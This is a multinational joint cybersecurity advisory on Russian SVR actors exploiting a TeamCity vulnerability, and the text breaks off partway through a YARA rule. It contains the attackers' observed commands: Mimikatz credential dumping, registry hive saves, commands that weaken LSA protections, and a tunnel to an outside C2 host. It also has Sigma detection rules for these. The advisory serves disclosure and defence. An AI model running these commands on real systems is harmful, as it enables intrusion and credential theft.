News Listing
December 13, 2023
Google released a security update to address multiple vulnerabilities in Google Chrome.
December 13, 2023
Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.
December 13, 2023
SUMMARY
The U.S. Federal Bureau of Investigation (FBI), U.S. Cybersecurity & Infrastructure Security Agency (CISA), U.S. National Security Agency (NSA), Polish Military Counterintelligence Service (SKW), CERT Polska (CERT.PL), and the UK’s National Cyber Security Centre (NCSC) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard—are exploiting CVE-2023-42793 at a large scale, targeting servers hosting JetBrains TeamCity software since September 2023.
Software developers use TeamCity software to manage and automate software compilation, building, testing, and releasing. If compromised, access to a TeamCity server would provide malicious actors with access to that software developer’s source code, signing certificates, and the ability to subvert software compilation and deployment processes—access a malicious actor could further use to conduct supply chain operations. Although the SVR used such access to compromise SolarWinds and its customers in 2020, limited number and seemingly opportunistic types of victims currently identified, indicate that the SVR has not used the access afforded by the TeamCity CVE in a similar manner. The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments.
To bring Russia’s actions to public attention, the authoring agencies are providing information on the SVR’s most recent compromise to aid organizations in conducting their own investigations and securing their networks, provide compromised entities with actionable indicators of compromise (IOCs), and empower private sector cybersecurity companies to better detect and counter the SVR’s malicious actions. The authoring agencies recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to the FBI and CISA.
Download the PDF version of this report:
AA23-347A Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally
(PDF, 774.65 KB
)
For a downloadable copy of IOCs, see:
AA23-347A STIX XML
(XML, 76.99 KB
)
AA23-347A STIX JSON
(JSON, 69.29 KB
)
THREAT OVERVIEW
SVR cyber operations pose a persistent threat to public and private organizations’ networks globally. Since 2013, cybersecurity companies and governments have reported on SVR operations targeting victim networks to steal confidential and proprietary information. A decade later, the authoring agencies can infer a long-term targeting pattern aimed at collecting, and enabling the collection of, foreign intelligence, a broad concept that for Russia encompasses information on the politics, economics, and military of foreign states; science and technology; and foreign counterintelligence. The SVR also conducts cyber operations targeting technology companies that enable future cyber operations.
A decade ago, public reports about SVR cyber activity focused largely on the SVR’s spear phishing operations, targeting government agencies, think tanks and policy analysis organizations, educational institutions, and political organizations. This category of targeting is consistent with the SVR’s responsibility to collect political intelligence, the collection of which has long been the SVR’s highest priority. For the Russian Government, political intelligence includes not only the development and execution of foreign policies, but also the development and execution of domestic policies and the political processes that drive them. In December 2016, the U.S. Government published a Joint Analysis Report titled “GRIZZLY STEPPE – Russian Malicious Cyber Activity,” which describes the SVR’s compromise of a U.S. political party leading up to a presidential election. The SVR’s use of spear phishing operations are visible today in its ongoing Diplomatic Orbiter campaign, primarily targeting diplomatic agencies. In 2023, SKW and CERT.PL published a Joint Analysis Report describing tools and techniques used by the SVR to target embassies in dozens of countries.
Less frequently, reporting on SVR cyber activity has addressed other aspects of the SVR’s foreign intelligence collection mission. In July 2020, U.S., U.K., and Canadian Governments jointly published an advisory revealing the SVR’s exploitation of CVEs to gain initial access to networks, and its deployment of custom malware known as WellMess, WellMail, and Sorefang to target organizations involved in COVID-19 vaccine development. Although not listed in the 2020 advisory did not mention it, the authoring agencies can now disclose that the SVR’s WellMess campaign also targeted energy companies. Such biomedical and energy targets are consistent with the SVR’s responsibility to support the Russian economy by pursuing two categories of foreign intelligence known as economic intelligence and science and technology.
In April 2021, the U.S. Government attributed a supply chain operation targeting the SolarWinds information technology company and its customers to the SVR. This attribution marked the discovery that the SVR had, since at least 2018, expanded the range of its cyber operations to include the widespread targeting of information technology companies. At least some of this targeting was aimed at enabling additional cyber operations. Following this attribution, the U.S. and U.K. Governments published advisories highlighting additional SVR TTPs, including its exploitation of various CVEs, the SVR’s use of “low and slow” password spraying techniques to gain initial access to some victims’ networks, exploitation of a zero-day exploit, and exploitation of Microsoft 365 cloud environments.
In this newly attributed operation targeting networks hosting TeamCity servers, the SVR demonstrably continues its practice of targeting technology companies. By choosing to exploit CVE-2023-42793, a software development program, the authoring agencies assess the SVR could benefit from access to victims, particularly by allowing the threat actors to compromise the networks of dozens of software developers. JetBrains issued a patch for this CVE in mid-September 2023, limiting the SVR’s operation to the exploitation of unpatched, Internet-reachable TeamCity servers. While the authoring agencies assess the SVR has not yet used its accesses to software developers to access customer networks and is likely still in the preparatory phase of its operation, having access to these companies’ networks presents the SVR with opportunities to enable hard-to- detect command and control (C2) infrastructure.
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. While SVR followed a similar playbook in each compromise, they also adjusted to each operating environment and not all presented steps or actions below were executed on every host.
Initial Access - Exploitation
The SVR started to exploit Internet-connected JetBrains TeamCity servers [T1190] in late September 2023 using CVE-2023-42793, which enables the insecure handling of specific paths allowing for bypassing authorization, resulting in arbitrary code execution on the server. The authoring agencies' observations show that the TeamCity exploitation usually resulted in code execution [T1203] with high privileges granting the SVR an advantageous foothold in the network environment. The authoring agencies are not currently aware of any other initial access vector to JetBrains TeamCity currently being exploited by the SVR.
Host Reconnaissance
Initial observations show the SVR used the following basic, built-in commands to perform host reconnaissance [T1033],[T1059.003],[T1592.002]:
whoami /priv
whoami /all
whoami /groups
whoami /domain
nltest -dclist
nltest -dsgetdc
tasklist
netstat
wmic /node:"""" /user:"""" /password:"""" process list brief
wmic /node:"""" process list brief
wmic process get commandline -all
wmic process get commandline
wmic process where name=""GoogleCrashHandler64.exe"" get commandline,processed
powershell ([adsisearcher]"((samaccountname=))").Findall().Properties
powershell ([adsisearcher]"((samaccountname=))").Findall().Properties.memberof
powershell Get-WmiObject -Class Win32_Service -Computername
powershell Get-WindowsDriver -Online -All
File Exfiltration
Additionally, the authoring agencies have observed the SVR exfiltrating files [T1041] which may provide insight into the host system’s operating system:
C:\Windows\system32\ntoskrnl.exe to precisely identify system version, likely as a prerequisite to deploy EDRSandBlast.
SQL Server executable files - based on the review of the post exploitation actions, the SVR showed an interest in specific files of the SQL Server installed on the compromised systems:
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll,
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllos.dll,
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllang.dll,
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqltses.dll
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\secforwarder.dll
Visual Studio files – based on the review of the post exploitation actions, the SVR showed an interest in specific files of the Visual Studio:
C:\Program Files (x86)\Microsoft Visual Studio\2017\SQL\Common7\IDE\VSIXAutoUpdate.exe
Update management agent files – based on the review of the post exploitation actions, the SVR showed an interest in executables and configuration of patch management software:
C:\Program Files (x86)\PatchManagementInstallation\Agent\12\Httpd\bin\httpd.exe
C:\Program Files (x86)\PatchManagementInstallation\Agent\12\Httpd
C:\ProgramData\GFI\LanGuard 12\HttpdConfig\httpd.conf
Interest in SQL Server
Based on the review of the exploitation, the SVR also showed an interest in details of the SQL Server [T1059.001],[T1505.001]:
powershell Compress-Archive -Path "C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllos.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllang.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqltses.dll" -DestinationPath C:\Windows\temp\1\sql.zip
SVR cyber actors also exfiltrated secforwarder.dll
Tactics Used to Avoid Detection
To avoid detection, the SVR used a “Bring Your Own Vulnerable Driver” [T1068] technique to disable or outright kill endpoint detection and response (EDR) and antivirus (AV) software [T1562.001].
This was done using an open source project called “EDRSandBlast.” The authoring agencies have observed the SVR using EDRSandBlast to remove protected process light (PPL) protection, which is used for controlling and protecting running processes and protecting them from infection. The actors then inject code into AV/EDR processes for a small subset of victims [T1068]. Additionally, executables that are likely to be detected (i.e. Mimikatz) were executed in memory [T1003.001].
In several cases SVR attempted to hide their backdoors via:
Abusing a DLL hijacking vulnerability in Zabbix software by replacing a legitimate Zabbix DLL with their one containing GraphicalProton backdoor,
Backdooring an open source application developed by Microsoft named vcperf. SVR modified and copied publicly available sourcecode. After execution, backdoored vcperf dropped several DLLs to disc, one of those being a GraphicalProton backdoor,
Abusing a DLL hijacking vulnerability in Webroot antivirus software by replacing a legitimate DLL with one containing GraphicalProton backdoor.
To avoid detection by network monitoring, the SVR devised a covert C2 channel that used Microsoft OneDrive and Dropbox cloud services. To further enable obfuscation, data exchanged with malware via OneDrive and Dropbox were hidden inside randomly generated BMP files [T1564], illustrated below:
Privilege Escalation
To facilitate privilege escalation [T1098], the SVR used multiple techniques, including WinPEAS, NoLMHash registry key modification, and the Mimikatz tool.
The SVR modified the NoLMHash registry using the following reg command:
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d "0" /f
The SVR used the following Mimikatz commands [T1003]:
privilege::debug
lsadump::cache
lsadump::secrets
lsadump::sam
sekurlsa::logonpasswords
Persistence
The SVR relied on scheduled tasks [T1053.005] to secure persistent execution of backdoors. Depending on the privileges the SVR had, their executables were stored in one of following directories:
C:\Windows\temp
C:\Windows\System32
C:\Windows\WinStore
The SVR made all modifications using the schtasks.exe binary. It then had multiple variants of arguments passed to schtasks.exe, which can be found in Appendix B – Indicators of Compromise.
To secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets (TGTs) [T1558.001].
Sensitive Data Exfiltration [T1020]
The SVR exfiltrated the following Windows Registry hives from its victims [T1003]:
HKLM\SYSTEM
HKLM\SAM
HKLM\SECURITY
In order to exfiltrate Windows Registry, the SVR saved hives into files [T1003.002], packed them, and then exfiltrated them using a backdoor capability. it used “reg save” to save SYSTEM, SAM and SECURITY registry hives, and used powershell to stage .zip archives in the C:\Windows\Temp\ directory.
reg save HKLM\SYSTEM ""C:\Windows\temp\1\sy.sa"" /y
reg save HKLM\SAM ""C:\Windows\temp\1\sam.sa"" /y
reg save HKLM\SECURITY ""C:\Windows\temp\1\se.sa"" /y
powershell Compress-Archive -Path C:\Windows\temp\1\ -DestinationPath C:\Windows\temp\s.zip -Force & del C:\Windows\temp\1 /F /Q
In a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session cookies, browsing history, or saved logins.
SVR also used DSInternals open source tool to interact with Directory Services. DSInternals allows to obtain a sensitive Domain information.
Network Reconnaissance
After the SVR built a secure foothold and gained an awareness of a victim’s TeamCity server, it then focused on network reconnaissance [T1590.004]. The SVR performed network reconnaissance using a mix of built-in commands and additional tools, such as port scanner and PowerSploit, which it launched into memory [T1046]. The SVR executed the following PowerSploit commands:
Get-NetComputer
Get-NetGroup
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount"
Get-NetDiDomain
Get-AdUser
Get-DomainUser -UserName
Get-NetUser -PreauthNotRequire
Get-NetComputer | select samaccountname
Get-NetUser -SPN | select serviceprincipalname
Tunneling into Compromised Environments
In selected environments the SVR used an additional tool named, “rr.exe”—a modified open source reverse socks tunneler named Rsockstun—to establish a tunnel to the C2 infrastructure [T1572].
The authoring agencies are aware of the following infrastructure used in conjunction with “rr.exe”:
65.20.97[.]203:443
Poetpages[.]com:8443
The SVR executed Rsockstun either in memory or using the Windows Management Instrumentation Command Line (WMIC) [T1047] utility after dropping it to disk:
wmic process call create "C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31"
Lateral Movement
The SVR used WMIC to facilitate lateral movement [T1047],[T1210].
wmic /node:"""" /user:""" /password:"""" process call create ""rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost""
The SVR also modified DisableRestrictedAdmin key to enable remote connections [T1210].
It modified Registry using the following reg command:
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d "0" /f
Adversary Toolset
In the course of the TeamCity operation, the SVR used multiple custom and open source available tools and backdoors. The following custom tools were observed in use during the operation:
GraphicalProton is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs [T1027.001] to exchange data with the SVR operator.
After execution, GraphicalProton gathers environment information such as active TCP/UDP connections [T1049], running processes [T1049], as well as user, host, and domain names [T1590]. OneDrive is used as a primary communication channel while Dropbox is treated as a backup channel [T1567]. API keys are hardcoded into the malware. When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files - with both commands and results [T1564.001]. Directory name is re-randomized each time the GraphicalProton process is started.
BMP files that were used to exchange data were generated in the following way:
Compress data using zlib,
Encrypt data using custom algorithm,
Add “***” string literal to encrypted data,
Create a random BMP with random rectangle,
And finally, encode encrypted data within lower pixel bits.
While the GraphicalProton backdoor has remained mostly unchanged over the months we have been tracking it, to avoid detection the adversary wrapped the tool in various different layers of obfuscation, encryption, encoders, and stagers. Two specific variants of GraphicalProton “packaging” are especially noteworthy – a variant that uses DLL hijacking [T1574.002] in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf [T1036], an open-source C++ build analysis tool from Microsoft.
GraphicalProton HTTPS variant – a variant of GraphicalProton backdoor recently introduced by the SVR that forgoes using cloud-based services as a C2 channel and instead relies on HTTP request.
To legitimize the C2 channel, SVR used a re-registered expired domain set up with dummy WordPress website. Execution of HTTPS variant of GraphicalProton is split into two files – stager and encrypted binary file that contains further code.
MITRE ATT&CK TACTICS AND TECHNIQUES
See below tables for all referenced threat actor tactics and techniques in this advisory. For additional mitigations, see the Mitigations section.
Table 1: SVR Cyber Actors ATT&CK Techniques for Enterprise - Reconnaissance
Technique Title
ID
Use
Gather Victim Network Information: Network Topology
T1590.004
SVR cyber actors may gather information about the victim’s network topology that can be used during targeting.
Gather Victim Host Information: Software
T1592.002
SVR cyber actors may gather information about the victim’s host networks that can be used during targeting.
Table 2: SVR Cyber Actors’ ATT&CK Techniques for Enterprise – Initial Access
Technique Title
ID
Use
Exploit Public-Facing Application
T1190
SVR cyber actors exploit internet-connected JetBrains TeamCity server using CVE-2023-42793 for initial access.
Table 3: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Execution
Technique Title
ID
Use
Command and Scripting Interpreter: PowerShell
T1059.001
SVR cyber actors used powershell commands to compress Microsoft SQL server .dll files.
Command and Scripting Interpreter: Windows Command Shell
T1059.003
SVR cyber actors execute these powershell commands to perform host reconnaissance:
powershell ([adsisearcher]"((samaccountname=))").Findall().Properties
powershell ([adsisearcher]"((samaccountname=))").Findall().Properties.memberof
powershell Get-WmiObject -Class Win32_Service -Computername
powershell Get-WindowsDriver -Online -All
Exploitation for Client Execution
T1203
SVR cyber actors leverage arbitrary code execution after exploiting CVE-2023-42793.
Hijack Execution Flow: DLL Side-Loading
T1574.002
SVR cyber actors use a variant of GraphicalProton that uses DLL hijacking in Zabbix as a means to start execution.
Table 4: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Persistence
Technique Title
ID
Use
Scheduled Task
T1053.005
SVR cyber actors may abuse Windows Task Schedule to perform task scheduling for initial or recurring execution of malicious code.
Server Software Component: SQL Stored Procedures
T1505.001
SVR cyber actors abuse SQL server stored procedures to maintain persistence.
Boot or Logon Autostart Execution
T1547
SVR cyber actors used C:\Windows\system32\ntoskrnl.exe to configure automatic system boot settings to maintain persistence.
Table 5: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Privilege Escalation
Technique Title
ID
Use
Exploitation for Privilege Escalation
T1068
SVR cyber actors exploit JetBrains TeamCity vulnerability to achieve escalated privileges.
To avoid detection, the SVR cyber actors used a “Bring Your Own Vulnerable Driver” technique to disable EDR and AV defense mechanisms.
Account Manipulation
T1098
SVR cyber actors may manipulate accounts to maintain and/or elevate access to victim systems.
Table 6: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Defense Evasion
Technique Title
ID
Use
Obfuscated Files or Information: Binary Padding
T1027.001
SVR cyber actors use BMPs to perform binary padding while exchange data is exfiltrated to an their C2 station.
Masquerading
T1036
SVR cyber actors use a variant that uses DLL hijacking in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf, an open-source C++ build analysis tool from Microsoft.
Process Injection
T1055
SVR cyber actors inject code into AV and EDR processes to evade defenses.
Disable or Modify Tools
T1562.001
SVR cyber actors may modify and/or disable tools to avoid possible detection of their malware/tools and activities.
Hide Artifacts
T1564
SVR cyber actors may attempt to hide artifacts associated with their behaviors to evade detection.
Hide Artifacts: Hidden Files and Directories
T1564.001
When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files - with both commands and results.
Table 7: SVR Cyber actors’ ATT&CK Techniques for Enterprise: Credential Access
Technique Title
ID
Use
OS Credential Dumping: LSASS Memory
T1003.001
SVR cyber actors executed Mimikatz commands in memory to gain access to credentials stored in memory.
OS Credential Dumping: Security Account Manager
T1003.002
SVR cyber actors used:
privilege::debug
lsadump::cache
lsadump::secrets
lsadump::sam
sekurlsa::logonpasswords
Mimikatz commands to gain access to credentials.
Additionally, SVR cyber actors exfiltrated Windows registry hives to steal credentials.
HKLM\SYSTEM
HKLM\SAM
HKLM\SECURITY
Credentials from Password Stores: Credentials from Web Browsers
T1555.003
In a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session cookies, browsing history, or saved logins.
Steal or Forge Kerberos Tickets: Golden Ticket
T1558.001
To secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets (TGTs).
Table 8: SVR Cyber Actors ATT&CK Techniques for Enterprise: Discovery
Technique Title
ID
Use
System Owner/User Discovery
T1033
SVR cyber actors use these built-in commands to perform host reconnaissance: whoami /priv, whoami / all, whoami / groups, whoami / domain to perform user discovery.
Network Service Discovery
T1046
SVR cyber actors performed network reconnaissance using a mix of built-in commands and additional tools, such as port scanner and PowerSploit.
Process Discovery
T1057
SVR cyber actors use GraphicalProton to gather running processes data.
Gather Victim Network Information
T1590
SVR cyber actors use GraphicalProton to gather victim network information.
Table 9: SVR Cyber Actors ATT&CK Techniques for Enterprise: Lateral Movement
Technique Title
ID
Use
Exploitation of Remote Services
T1210
SVR cyber actors may exploit remote services to gain unauthorized access to internal systems once inside a network.
Windows Management Instrumentation
T1047
SVR cyber actors executed Rsockstun either in memory or using Windows Management Instrumentation (WMI) to execute malicious commands and payloads.
wmic process call create "C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31"
Table 10: SVR Cyber Actors ATT&CK Techniques for Enterprise: Command and Control
Technique Title
ID
Use
Dynamic Resolution
T1568
SVR may dynamically establish connections to command-and-control infrastructure to evade common detections and remediations.
Protocol Tunneling
T1572
SVR cyber actors may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems.
In selected environments, the SVR used an additional tool named, “rr.exe”—a modified open source reverse socks tunneler named Rsockstunm—to establish a tunnel to the C2 infrastructure.
Table 11: SVR Cyber Actors ATT&CK Techniques for Enterprise: Exfiltration
Technique Title
ID
Use
Automated Exfiltration
T1020
SVR cyber actors may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during collection.
Exfiltration Over C2 Channel
T1041
SVR cyber actors may steal data by exfiltrating it over an existing C2 channel. Stolen data is encoded into normal communications using the same protocol as C2 communications.
Exfiltration Over Web Service
T1567
SVR cyber actors use OneDrive and Dropbox to exfiltrate data to their C2 station.
INDICATORS OF COMPROMISE
Note: Please refer to Appendix B for a list of IOCs.
VICTIM TYPES
As a result of this latest SVR cyber activity, the FBI, CISA, NSA, SKW, CERT Polska, and NCSC have identified a few dozen compromised companies in the United States, Europe, Asia, and Australia, and are aware of over a hundred compromised devices though we assess this list does not represent the full set of compromised organizations. Generally, the victim types do not fit into any sort of pattern or trend, aside from having an unpatched, Internet-reachable JetBrains TeamCity server, leading to the assessment that SVR’s exploitation of these victims’ networks was opportunistic in nature and not necessarily a targeted attack. Identified victims included: an energy trade association; companies that provide software for billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games; as well as hosting companies, tools manufacturers, and small and large IT companies.
DETECTION METHODS
The following rules can be used to detect activity linked to adversary activity. These rules should serve as examples and adapt to each organization’s environment and telemetry.
SIGMA Rules
title: Privilege information listing via whoami
description: Detects whoami.exe execution and listing of privileges
author:
references: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'whoami.exe'
CommandLine|contains:
- 'priv'
- 'PRIV'
condition: selection
falsepositives: legitimate use by system administrator
title: DC listing via nltest
description: Detects nltest.exe execution and DC listing
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'nltest.exe'
CommandLine|re: '.*dclist\:.*|.*DCLIST\:.*|.*dsgetdc\:.*|.*DSGETDC\:.*'
condition: selection
falsepositives: legitimate use by system administrator
title: DLL execution via WMI
description: Detects DLL execution via WMI
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'WMIC.exe'
CommandLine|contains|all:
- 'call'
- 'rundll32'
condition: selection
falsepositives: legitimate use by software or system administrator
title: Process with connect and pass as args
description: Process with connect and pass as args
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'pass'
- 'connect'
condition: selection
falsepositives: legitimate use of rsockstun or software with exact same arguments
title: Service or Drive enumeration via powershell
description: Service or Drive enumeration via powershell
author:
references:
date: 2023/11/15
logsource:
category: ps_script
product: windows
detection:
selection_1:
ScriptBlockText|contains|all:
- 'Get-WmiObject'
- '-Class'
- 'Win32_Service'
selection_2:
ScriptBlockText|contains|all:
- 'Get-WindowsDriver'
- '-Online'
- '-All'
condition: selection_1 or selection_2
falsepositives: legitimate use by system administrator
title: Compressing files from temp to temp
description: Compressing files from temp\ to temp used by SVR to prepare data to be exfiltrated
references:
author:
date: 2023/11/15
logsource:
category: ps_script
product: windows
detection:
selection:
ScriptBlockText|re: '.*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1-9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*'
condition: selection
title: DLL names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific DLL names.
references:
author:
date: 2023/11/15
logsource:
category: image_load
product: windows
detection:
selection:
ImageLoaded|endswith:
- 'AclNumsInvertHost.dll'
- 'ModeBitmapNumericAnimate.dll'
- 'UnregisterAncestorAppendAuto.dll'
- 'DeregisterSeekUsers.dll'
- 'ScrollbarHandleGet.dll'
- 'PerformanceCaptionApi.dll'
- 'WowIcmpRemoveReg.dll'
- 'BlendMonitorStringBuild.dll'
- 'HandleFrequencyAll.dll'
- 'HardSwapColor.dll'
- 'LengthInMemoryActivate.dll'
- 'ParametersNamesPopup.dll'
- 'ModeFolderSignMove.dll'
- 'ChildPaletteConnected.dll'
- 'AddressResourcesSpec.dll'
condition: selection
title: Sensitive registry entries saved to file
description: Sensitive registry entries saved to file
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection_base:
Image|endswith:
- 'reg.exe'
CommandLine|contains: 'save'
CommandLine|re: '.*HKLM\\SYSTEM.*|.*HKLM\\SECURITY.*|.*HKLM\\SAM.*'
selection_file:
CommandLine|re: '.*sy\.sa.*|.*sam\.sa.*|.*se\.sa.*'
condition: selection_base and selection_file
title: Scheduled tasks names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific scheduled task names
author:
references:
date: 2023/11/15
logsource:
category: taskscheduler
product: windows
detection:
selection:
EventID:
- 4698
- 4699
- 4702
TaskName:
- '\Microsoft\Windows\IISUpdateService'
- '\Microsoft\Windows\WindowsDefenderService'
- '\Microsoft\Windows\WindowsDefenderService2'
- '\Microsoft\DefenderService'
- '\Microsoft\Windows\DefenderUPDService'
- '\Microsoft\Windows\WiMSDFS'
- '\Microsoft\Windows\Application Experience\StartupAppTaskCkeck'
- '\Microsoft\Windows\Windows Error Reporting\SubmitReporting'
- '\Microsoft\Windows\Windows Defender\Defender Update Service'
- '\WindowUpdate'
- '\Microsoft\Windows\Windows Error Reporting\CheckReporting'
- '\Microsoft\Windows\Application Experience\StartupAppTaskCheck'
- '\Microsoft\Windows\Speech\SpeechModelInstallTask'
- '\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStart'
- '\Microsoft\Windows\Data Integrity Scan\Data Integrity Update'
- '\Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck'
- '\Microsoft\Windows\ATPUpd'
- '\Microsoft\Windows\Windows Defender\Service Update'
- '\Microsoft\Windows\WindowsUpdate\Scheduled Check'
- '\Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck'
- '\Defender'
- '\defender'
- '\\Microsoft\\Windows\\IISUpdateService'
- '\\Microsoft\\Windows\\WindowsDefenderService'
- '\\Microsoft\\Windows\\WindowsDefenderService2'
- '\\Microsoft\\DefenderService'
- '\\Microsoft\\Windows\\DefenderUPDService'
- '\\Microsoft\\Windows\\WiMSDFS'
- '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck'
- '\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting'
- '\\Microsoft\\Windows\\Windows Defender\\Defender Update Service'
- '\\WindowUpdate'
- '\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting'
- '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck'
- '\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask'
- '\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart'
- '\\Microsoft\\Windows\\Data Integrity Scan\Data Integrity Update'
- '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'
- '\\Microsoft\\Windows\\ATPUpd'
- '\\Microsoft\\Windows\\Windows Defender\\Service Update'
- '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check'
- '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'
- '\\Defender'
- '\\defender'
condition: selection
title: Scheduled tasks names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific scheduled task names
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'schtasks.exe'
CommandLine|contains:
- 'IISUpdateService'
- 'WindowsDefenderService'
- 'WindowsDefenderService2'
- 'DefenderService'
- 'DefenderUPDService'
- 'WiMSDFS'
- 'StartupAppTaskCkeck'
- 'SubmitReporting'
- 'Defender Update Service'
- 'WindowUpdate'
- 'CheckReporting'
- 'StartupAppTaskCheck'
- 'SpeechModelInstallTask'
- 'BfeOnServiceStart'
- 'Data Integrity Update'
- 'Scheduled AutoCheck'
- 'ATPUpd'
- 'Service Update'
- 'Scheduled Check'
- 'Scheduled AutoCheck'
- 'Defender'
- 'defender'
selection_re:
Image|endswith:
- 'schtasks.exe'
CommandLine|re:
- '.*Defender\sUpdate\sService.*'
- '.*Data\sIntegrity\sUpdate.*'
- '.*Scheduled\sAutoCheck.*'
- '.*Service\sUpdate.*'
- '.*Scheduled\sCheck.*'
- '.*Scheduled\sAutoCheck.*'
condition: selection or selection_re
title: Suspicious registry modifications
description: Suspicious registry modifications
author:
references:
date: 2023/11/15
logsource:
category: registry_set
product: windows
detection:
selection:
EventID: 4657
TargetObject|contains:
- 'CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin'
- 'CurrentControlSet\\Control\\Lsa\\NoLMHash'
condition: selection
title: Registry modification from cmd
description: Registry modification from cmd
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'reg.exe'
CommandLine|contains|all:
- 'CurrentControlSet'
- 'Lsa'
CommandLine|contains:
- 'DisableRestrictedAdmin'
- 'NoLMHash'
condition: selection
title: Malicious Driver Load
description: Detects the load of known malicious drivers via their names or hash.
references:
- https://github.com/wavestone-cdt/EDRSandblast#edr-drivers-and-processes-detection
author:
date: 2023/11/15
logsource:
category: driver_load
product: windows
detection:
selection_name:
ImageLoaded|endswith:
- 'RTCore64.sys'
- 'DBUtils_2_3.sys'
selection_hash:
Hashes|contains:
- '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd'
- '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5'
condition: selection_name or selection_hash
YARA rules
The following rule detects most known GraphicalProton variants.
rule APT29_GraphicalProton {
strings:
// C1 E9 1B shr ecx, 1Bh
// 48 8B 44 24 08 mov rax, [rsp+30h+var_28]
// 8B 50 04 mov edx, [rax+4]
// C1 E2 05 shl edx, 5
// 09 D1 or ecx, edx
// 48 8B 44 24 08 mov rax, [rsp+30h+var_28]
